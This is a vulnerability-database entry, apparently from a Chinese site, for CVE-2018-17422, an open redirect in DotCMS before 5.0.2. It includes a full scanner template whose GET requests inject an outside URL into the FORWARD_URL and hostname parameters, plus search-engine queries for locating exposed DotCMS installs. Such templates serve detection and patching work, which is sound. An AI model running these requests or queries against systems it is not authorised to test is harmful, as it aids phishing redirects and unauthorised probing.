CVE-2018-17422: DotCMS < 5.0.2 - Open Redirect

日期: 2025-08-01 | 影响软件: DotCMS | POC: 已公开

漏洞描述

dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2018-17422

info:
  name: DotCMS < 5.0.2 - Open Redirect
  author: 0x_Akoko,daffainfo
  severity: medium
  description: |
    dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability.
  reference:
    - https://github.com/dotCMS/core/issues/15286
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17422
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-17422
    cwe-id: CWE-601
    epss-score: 0.10623
    epss-percentile: 0.93029
    cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: dotcms
    product: dotcms
    shodan-query:
      - http.title:"dotCMS"
      - http.title:"dotcms"
    fofa-query: title="dotcms"
    google-query: intitle:"dotcms"
  tags: cve2018,cve,redirect,dotcms,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me'
      - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me'

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "self.location = 'http://oast.me'"
          - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'"
# digest: 4b0a00483046022100aa02b108dfaa1d922642188b73812d5e9f3293373d4e23222c468e8045a93479022100dc540d723bf93ad3b07b2794be2d76f388ee8c9a06d71bb9e56ccb2446c1f141:922c64590222798bb761d5b6d8e72950

相关漏洞推荐